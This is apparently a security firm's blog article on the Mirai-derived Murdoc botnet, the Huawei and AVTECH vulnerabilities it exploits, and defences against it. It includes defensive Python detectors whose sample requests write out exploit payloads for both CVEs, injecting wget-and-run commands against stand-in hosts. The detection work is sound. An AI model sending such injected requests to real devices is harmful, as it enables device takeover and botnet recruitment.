The global threat of the Murdoc botnet: How are cybercriminals exploiting vulnerabilities in common devices?

In the modern digital age, we live in an increasingly interconnected world, where smart devices and internet connectivity have been integrated into all aspects of our daily lives. From security cameras to smart thermostats, refrigerators, and lighting systems, Internet of Things (IoT) devices are present in millions of homes and businesses. While these advancements have brought countless benefits in terms of convenience and efficiency, they have also opened the doors to new and sophisticated types of cyberattacks.

One of the more concerning threats to emerge in this environment is the Murdoc botnet, a Mirai-derived malware family that exploits known vulnerabilities in widely deployed devices, AVTECH IP cameras and Huawei HG532 routers among them, and recruits them into a botnet used for large-scale attacks. Murdoc does not only jeopardize the security of the compromised devices and their owners: the traffic it generates is aimed at third parties, so it also threatens online services and the shared digital infrastructure they run on.

In this article from ITD Consulting we look at how the Murdoc botnet works, how it spreads, and what measures can be taken to protect against it. We also examine the impact these attacks have on businesses, users and society in general, and how Murdoc evolved from earlier incidents such as the Mirai attacks of 2016.


What is a botnet?

A botnet is a network of devices infected by malware, which allows attackers to remotely control those devices. The devices that are part of a botnet are known as "bots" or "zombies," as they act without the knowledge or consent of their owners. 

These bots are used to carry out a variety of malicious activities, such as Distributed Denial of Service (DDoS) attacks, stealing personal information, distributing malware, and digital extortion. What makes a botnet so dangerous is its ability to carry out large-scale attacks. 

By controlling thousands, or even millions, of devices, cybercriminals can aggregate enormous amounts of bandwidth and request volume, enough to overwhelm online systems and disrupt services, and the same control over each device exposes whatever data passes through it.

The Murdoc botnet is a modern variant of the Mirai botnet, which wreaked havoc in 2016 with massive DDoS attacks that cut off access to popular platforms such as Netflix, Twitter and Spotify. Mirai's source code was published online in late 2016, and although its authors were later identified and prosecuted, that release allowed other cybercriminals to modify and adapt it; attacks built on it have continued ever since and have evolved into new variants, Murdoc among them.

The resurgence of the Murdoc botnet: Features and propagation methods

Murdoc is characterized by its ability to infect a wide variety of internet-connected devices, which makes it a global and multifaceted threat. Where the original Mirai spread chiefly by guessing weak Telnet credentials, the Murdoc campaign relies on exploiting known software vulnerabilities, a propagation method that does not depend on the owner having left a default password in place.

According to the Qualys Threat Research Unit, Murdoc attackers have begun exploiting known vulnerabilities in common devices such as AVTECH cameras and Huawei HG532 routers. These vulnerabilities are exploited by attackers to take remote control of the devices and use them as part of the Murdoc botnet.

Qualys attributes the infections to two vulnerabilities: CVE-2017-17215, a command injection in the UPnP service of Huawei HG532 routers, disclosed in 2017, and CVE-2024-7029, an unauthenticated command injection in AVTECH IP cameras, disclosed in 2024. Once either flaw is exploited, the Murdoc payload is installed and the device becomes part of the botnet controlled by the cybercriminals.

The infection process starts with exploitation: the attacker sends a crafted request, built to trigger the flaw in the device's firmware, which makes the device run commands of the attacker's choosing. Typically those commands fetch a small shell script that in turn downloads and executes the Murdoc binary.

Once the exploit has been successfully executed, a malicious Murdoc file is loaded that connects the infected device to the botnet. From there, the device is remotely controlled by the attackers, who can use it to carry out a range of malicious activities, including sending massive traffic in a DDoS attack.

According to Qualys researchers, more than 500 malicious file samples have been identified as capable of infecting a wide variety of IoT devices, such as IP cameras and routers. These infected devices can be used to carry out DDoS attacks, meaning they can send enormous amounts of traffic to a victim's servers, overwhelming their systems and causing significant service disruption.
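The exploitation step described above leaves a recognisable trace in the requests that reach the device, and that is where a gateway, WAF or IDS in front of an IoT segment can catch it. The following Python detector is an added example and is not code from ITD Consulting or from Qualys. The endpoint and parameter names are those given in the public advisories and write-ups for the two CVEs (Check Point's 2017 disclosure of the HG532 UPnP flaw; the 2024 Akamai SIRT report on the AVTECH camera flaw); the sample requests, the hostnames and the addresses in them are constructed for this example.

```python
"""Exploit-attempt detector for the two CVEs named in the article.

Added example, not ITD Consulting's or Qualys's code. The request shapes
follow the public advisories; the samples below are constructed.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote_plus, urlsplit

# Characters that have no place in a URL or a numeric setting, but that a
# shell needs in order to chain an injected command onto the expected value.
SHELL_META = re.compile(r"[;|`&\n]|\$\(")


@dataclass
class Request:
    method: str
    target: str      # request path plus query string
    body: str = ""


def query_params(target):
    """Decode the query string by hand so that an encoded ';' (%3B) and a
    literal ';' both reach the metacharacter check unchanged."""
    pairs = []
    for chunk in urlsplit(target).query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def check_huawei_upgrade(req):
    """CVE-2017-17215 (Huawei HG532): the UPnP DeviceUpgrade action, reachable
    on TCP 37215, passed NewStatusURL/NewDownloadURL to a shell unvalidated."""
    if req.method != "POST" or urlsplit(req.target).path != "/ctrlt/DeviceUpgrade_1":
        return None
    for tag in ("NewStatusURL", "NewDownloadURL"):
        m = re.search(rf"<{tag}>(.*?)</{tag}>", req.body, re.S)
        if m and SHELL_META.search(m.group(1)):
            return f"CVE-2017-17215: shell metacharacters in <{tag}>"
    return None


def check_avtech_factory(req):
    """CVE-2024-7029 (AVTECH cameras): Factory.cgi passed the 'brightness'
    argument to a shell. Anything but a plain integer is treated as suspect
    (assumption: a legitimate brightness value is numeric)."""
    if urlsplit(req.target).path != "/cgi-bin/supervisor/Factory.cgi":
        return None
    for name, value in query_params(req.target):
        if name == "brightness" and (SHELL_META.search(value) or not value.isdigit()):
            return "CVE-2024-7029: non-numeric 'brightness' argument"
    return None


CHECKS = (check_huawei_upgrade, check_avtech_factory)


def classify(req):
    """Return the first matching verdict, or None for a request that looks benign."""
    for check in CHECKS:
        verdict = check(req)
        if verdict:
            return verdict
    return None


# Constructed samples modelled on the public descriptions. 198.51.100.7 and
# 203.0.113.5 are documentation addresses standing in for real hosts.
SAMPLES = [
    Request("POST", "/ctrlt/DeviceUpgrade_1",
            "<NewStatusURL>$(/bin/busybox wget -g 198.51.100.7 -l /tmp/x -r /x; sh /tmp/x)"
            "</NewStatusURL><NewDownloadURL>http://198.51.100.7/fw.bin</NewDownloadURL>"),
    Request("GET", "/cgi-bin/supervisor/Factory.cgi?action=modifyinfo"
                   "&brightness=1%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx.sh%20-O%20%2Ftmp%2Fx.sh"),
    Request("GET", "/cgi-bin/supervisor/Factory.cgi?action=modifyinfo&brightness=45"),
    Request("POST", "/ctrlt/DeviceUpgrade_1",
            "<NewStatusURL>http://203.0.113.5/status</NewStatusURL>"),
]


def scan(requests=SAMPLES):
    """Classify each request; the list lines up with the input."""
    return [classify(r) for r in requests]


if __name__ == "__main__":
    for req, verdict in zip(SAMPLES, scan()):
        print(f"{req.method} {req.target[:55]:55} -> {verdict or 'ok'}")
```

The two checks are deliberately allow-list shaped: the HG532 action should only ever carry URLs, and the camera's brightness argument should only ever be a number, so anything else is worth an alert regardless of which payload the attacker chose. Percent-decoding by hand rather than with `parse_qs` matters, because an attacker will encode the semicolon if a literal one is blocked.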

The Murdoc botnet and DDoS attacks

One of the primary objectives of the Murdoc botnet is to carry out Distributed Denial of Service (DDoS) attacks. In a DDoS attack the bots flood a victim's servers or network links with traffic until they can no longer serve legitimate requests. This can take online platforms and essential services offline and, for businesses, disrupt their ability to operate normally.

Like other Mirai descendants, Murdoc's strength lies in compromising commonly used IoT devices and expanding its network aggressively. Each new device adds to the scale of the attacks, allowing the operators to generate larger and more powerful traffic flows. A successful DDoS attack not only disrupts the service but also causes economic and reputational damage to the victims.

Since the Murdoc botnet was detected in July 2024, over 1,370 devices have been compromised, and the botnet continues to grow. The countries most affected by this Murdoc threat include Malaysia, Mexico, Thailand, Indonesia, and Vietnam. 

However, any device vulnerable to Murdoc connected to the Internet can be targeted by this attack. This means the threat of Murdoc is global and affects millions of users and organizations worldwide.


The global impact of the Murdoc botnet

Although most of the compromised devices observed so far are in Asia and Latin America, the threat is global: the bots attack targets anywhere, and the vulnerable device models are sold worldwide. What makes Murdoc particularly concerning is that the attackers compromise everyday equipment such as security cameras, routers and other IoT appliances. Because these devices are so widespread, any user or company connected to the Internet can become a victim, either as the owner of a hijacked device or as the target of its traffic.

The impact of a DDoS attack is not limited to service disruption. It can also have serious economic and reputational consequences for the affected companies. If an e-commerce website or an online platform is disrupted by a DDoS attack, customers will be unable to access the services, resulting in a loss of revenue and trust in the brand.

With surveillance devices such as IP cameras, the risk is not only service disruption but also exposure of privacy. The exploit gives the attacker command execution on the camera itself, so the same foothold could be used to access the video feed or to pivot into the network behind the camera. An attack of this kind would have far more serious implications if carried out against critical infrastructure or essential services.

The origin and evolution from Mirai to Murdoc

The Murdoc botnet is not a new threat; it is an evolution of the well-known Mirai botnet, which was responsible for some of the largest DDoS attacks seen up to that point. In October 2016, Mirai was used to attack Dyn, a provider of DNS services, causing a massive outage of popular platforms such as Netflix, Twitter and Spotify. The attackers used compromised IoT devices, chiefly security cameras, DVRs and routers, to generate the traffic that overwhelmed Dyn's infrastructure.

Mirai's source code had been released online in late September 2016, a few weeks before the Dyn attack, and this allowed other cybercriminals to adapt and modify the malware. Since then Mirai has given rise to a long line of variants, including Murdoc, that are capable of exploiting a broader range of vulnerabilities in connected devices.

What makes Murdoc dangerous is how quickly it adopts new vulnerabilities. While the original Mirai mainly targeted devices protected by default or weak passwords, Murdoc exploits software flaws in devices from well-known brands such as Huawei and AVTECH, so a device can be compromised even when its owner has changed the password; this significantly increases its ability to spread.

How to protect yourself from the Murdoc botnet and other cyberattacks?

As cyberattacks continue to evolve, it is crucial for users and companies to take preventive measures to protect themselves from botnets like Murdoc. Here are some key recommendations to defend against Murdoc.

  • Update firmware and software: keep Internet-connected devices up to date so that known vulnerabilities are closed. Manufacturers release security patches to fix flaws in device software, and those patches should be installed as soon as they become available. If a device no longer receives updates from its manufacturer, the only real fix is to isolate it or replace it.
  • Change default passwords: many IoT devices, such as security cameras and routers, come with default passwords that attackers can exploit. Changing these to strong, unique passwords is one of the best ways to protect your devices, although it does not stop exploitation of a software flaw like the two Murdoc uses.
  • Monitor network traffic: if you are a network administrator, watch for unusual patterns that may indicate a botnet infection, such as a camera suddenly opening thousands of connections to a single external host or probing other addresses. Detecting suspicious activity early helps prevent greater damage.
  • Disable unnecessary services: many IoT devices expose services such as Telnet or UPnP by default, and these can serve as an entry point (CVE-2017-17215 is reached through the HG532's UPnP service). If you do not need a service, disable it, and never expose a device's management interface to the Internet.
  • Segregate networks: if you have multiple IoT devices in your home or business, put them on a separate network or VLAN with no access to critical systems. A compromised device then cannot reach more valuable ones, and the segment's traffic is easy to monitor.
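The "monitor network traffic" and "segregate networks" points above can be turned into a concrete check once the IoT devices sit on their own segment. The following Python script is an added example, not code from ITD Consulting or from Qualys: it triages constructed flow records (timestamp, source, source port, destination, destination port, the kind of data a gateway or NetFlow collector exports for a VLAN) and reports the three behaviours the article associates with a Murdoc-style compromise: a management port on an IoT device reachable from the Internet, one device flooding a single external target, and one device probing many addresses on the same port. The subnet, the list of "internal" ranges, the port list and the thresholds are assumptions to adjust for a real network.

```python
"""Flow-log triage for an IoT segment (added example with constructed data)."""
import ipaddress
from collections import defaultdict

# Assumptions: the IoT VLAN, what counts as "internal", and the thresholds.
IOT_SUBNET = ipaddress.ip_network("192.168.50.0/24")
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
MGMT_PORTS = {23: "Telnet", 2323: "Telnet (alt)", 37215: "UPnP (CVE-2017-17215)"}
WINDOW = 60            # seconds; flows are bucketed by floor(ts / WINDOW)
FLOOD_THRESHOLD = 50   # flows from one device to one target per window
SCAN_THRESHOLD = 20    # distinct targets on one port per window


def is_internal(ip):
    return any(ip in net for net in INTERNAL)


def parse_flow(line):
    """Record format: epoch_seconds,src_ip,src_port,dst_ip,dst_port"""
    ts, src, sport, dst, dport = line.strip().split(",")
    return int(ts), ipaddress.ip_address(src), int(sport), ipaddress.ip_address(dst), int(dport)


def analyze(lines):
    """Return sorted (device, kind, detail) findings; kind is one of
    'exposed_mgmt', 'flood' or 'scan'."""
    findings = set()
    flows_to_target = defaultdict(int)   # (bucket, device, dst) -> flow count
    targets_on_port = defaultdict(set)   # (bucket, device, dport) -> {dst}
    for line in lines:
        ts, src, _sport, dst, dport = parse_flow(line)
        bucket = ts // WINDOW
        # Inbound: an outside address reaching a management port on an IoT device.
        if dst in IOT_SUBNET and not is_internal(src) and dport in MGMT_PORTS:
            findings.add((str(dst), "exposed_mgmt",
                          f"{MGMT_PORTS[dport]} on port {dport} reached from {src}"))
        # Outbound: per-target volume and per-port fan-out for each IoT device.
        if src in IOT_SUBNET and not is_internal(dst):
            flows_to_target[(bucket, src, dst)] += 1
            targets_on_port[(bucket, src, dport)].add(dst)
    for (_b, dev, dst), n in flows_to_target.items():
        if n >= FLOOD_THRESHOLD:
            findings.add((str(dev), "flood", f"{n} flows to {dst} within {WINDOW}s"))
    for (_b, dev, dport), targets in targets_on_port.items():
        if len(targets) >= SCAN_THRESHOLD:
            findings.add((str(dev), "scan",
                          f"{len(targets)} distinct hosts on port {dport} within {WINDOW}s"))
    return sorted(findings)


def constructed_flows():
    """Synthetic records for the demonstration, not captured traffic."""
    base = 1_700_000_000
    flows = []
    for i in range(80):   # an infected camera: 80 flows to one target in 20 s
        flows.append(f"{base + i // 4},192.168.50.12,{40000 + i},203.0.113.9,443")
    for i in range(3):    # a thermostat doing ordinary telemetry
        flows.append(f"{base + i * 10},192.168.50.30,{50000 + i},198.51.100.2,443")
    flows.append(f"{base + 5},203.0.113.77,51515,192.168.50.12,23")   # Internet -> camera Telnet
    for i in range(30):   # a router probing 30 neighbours on port 2323
        flows.append(f"{base + 10 + i},192.168.50.1,{45000 + i},198.51.100.{10 + i},2323")
    return flows


if __name__ == "__main__":
    for device, kind, detail in analyze(constructed_flows()):
        print(f"{device:15} {kind:13} {detail}")
```

Run on the constructed records it reports the camera twice (Telnet reachable from outside, and a flood towards one host) and the router once (scanning), while the thermostat's handful of telemetry connections stays silent. Fixed time buckets keep the code short; a sliding window would catch a burst that straddles a bucket boundary, and the thresholds should be set from a baseline of the segment's normal traffic.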

The Murdoc botnet is not just an isolated threat, but rather reflects a growing trend in the field of cybersecurity, where attackers exploit vulnerabilities in commonly used devices, such as security cameras, routers, and other Internet of Things (IoT) devices. These devices, often neglected in terms of maintenance and security, represent vulnerable points within our personal and business networks. 

The evolution of Murdoc from the Mirai botnet demonstrates how cybercriminals can learn from their previous attacks, adapting their malware to new vulnerabilities and expanding their capabilities to cause greater damage. This ability to adapt makes Murdoc an even more dangerous and difficult-to-eradicate threat, as attackers continue to find ways to exploit security gaps in connected devices, allowing them to keep their botnets active and effective.

The fight against botnets like Murdoc requires a collaborative approach involving all actors, from individual users to large corporations and governments. For businesses, especially those that rely on critical infrastructure and online services, the consequences of a DDoS attack can be devastating not only in economic terms but also in customer trust. 

Government institutions, in turn, must implement policies that promote greater security in national infrastructures, especially in the context of smart cities and the growing interconnection of essential services. On an individual level, people also have a responsibility to protect their devices, ensuring they remain updated and properly configured to reduce the risk of becoming victims of these attacks.

Additionally, it is essential that users and organizations do not underestimate the value of security in IoT devices, even though they may sometimes seem harmless or insignificant. The tendency to install smart devices without considering their security implications is one of the main reasons why attacks like those from Murdoc have become so effective. 

The lack of preventive measures, such as changing default passwords or disabling unnecessary services, opens an easy door for attackers, who can take control of these devices and use them as an extension of their botnet. This highlights the need to educate users about the risks associated with constant connectivity and the importance of basic online security practices.

Ultimately, protection against the Murdoc botnet and other similar cyber threats is not just a technical challenge but also a matter of awareness and digital responsibility. As technology continues to advance and device interconnection grows, so does the need for a more conscious and proactive approach to security. 

Users must be aware that protecting their devices not only guarantees their own security but also contributes to the security of global digital infrastructure. Only through a sustained collective effort, including preventive measures, constant updates, and continuous vigilance, can we mitigate the impact of these threats and keep our infrastructures and data safe from cybercriminals.
If you want to learn more about the latest cybersecurity threats like the Murdoc botnet and how to protect yourself, write to us at [email protected]. We have cybersecurity solutions tailored to your needs.
